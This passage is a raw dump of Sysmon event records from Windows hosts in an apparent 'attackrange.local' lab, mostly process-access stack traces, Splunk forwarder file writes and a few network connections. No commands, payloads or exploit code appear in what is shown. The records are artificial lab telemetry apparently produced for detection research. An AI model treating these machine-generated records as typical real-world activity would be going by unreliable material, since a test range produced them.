Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CAAD54FE055C0A7A7BFF5529387AB2C9,SHA256=DF5613C2E05DC2AA5594584A98D65BA92F8A2E5DA01F77B215F65A24F375F7E8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051159Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.382{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051158Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.381{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051157Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.381{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.379{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\Windows.UI.Immersive.dll+1d16|C:\Windows\System32\Windows.UI.Immersive.dll+2362|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider
.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.379{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.UI.Immersive.dll+2f6d|C:\Windows\System32\Windows.UI.Immersive.dll+2213|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001051154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:32.377{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.376{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:32.376{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.374{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.374{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:32.374{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.374{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.365{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:32.364{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051145Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.363{466BC892-02AF-60E8-1000-00000000CF01}4321692C:\Windows\system32\svchost.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051144Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.361{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051143Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:32.361{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051142Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.142{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02AF-60E8-0C00-00000000CF01}844C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051141Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.131{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001051140Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:32.131{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F5EB-60EB-867D-00000000CF01}2348C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051166Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:33.999{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B23E5395F928BE7341ED1F47B8FEB310,SHA256=DEE7D5A086129136D568549C7233CE753E3DBE1316F66969D36BD302CC13D4AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808563Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:33.650{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3457F76F10ABB0C35FD8EA0ADD9E3E5,SHA256=16E11E551624C36A0E8D1B659EE8BAAF6A020649E943471A02A430422CC18E47,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808562Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:31.251{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57333-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808564Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:34.680{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18761AD1C6CD8E6AA00C35BC5DB0E892,SHA256=96BC0D19F542F9076ADCD2A0A7C88A443241368F1A473DEA1293E52F3C1A1F6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808566Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:35.727{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6B34E5F79102B25D1690B193B4C6BEB,SHA256=4AAAF2738E72DA4C2660F4D9B1C8D719583C684B43698139A20376C30A8AE9F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051168Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:26.773{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51100-false10.0.1.12-8000- 23542300x80000000000000001051167Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:35.018{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B0238BD0E8981045E65F24DA12FFA85,SHA256=613B497DFCF3AD3DE980603628BDCBD53167641BD77AF2862FEAC673F99634D8,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808565Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:33.845{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse65.49.20.68scan-19.shadowserver.org53998-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000808567Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:36.758{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32AC9F2D434A0051F2101E4207A25B36,SHA256=67541BEDE47D9ADE58DA82DC0FCF0478DB590246066DB408CDD08AB4CC474E0D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051177Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.725{466BC892-F5E6-60EB-817D-00000000CF01}8472ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\bob\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x80000000000000001051176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.462{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.461{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:36.461{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.449{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.449{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:57:36.448{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.447{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 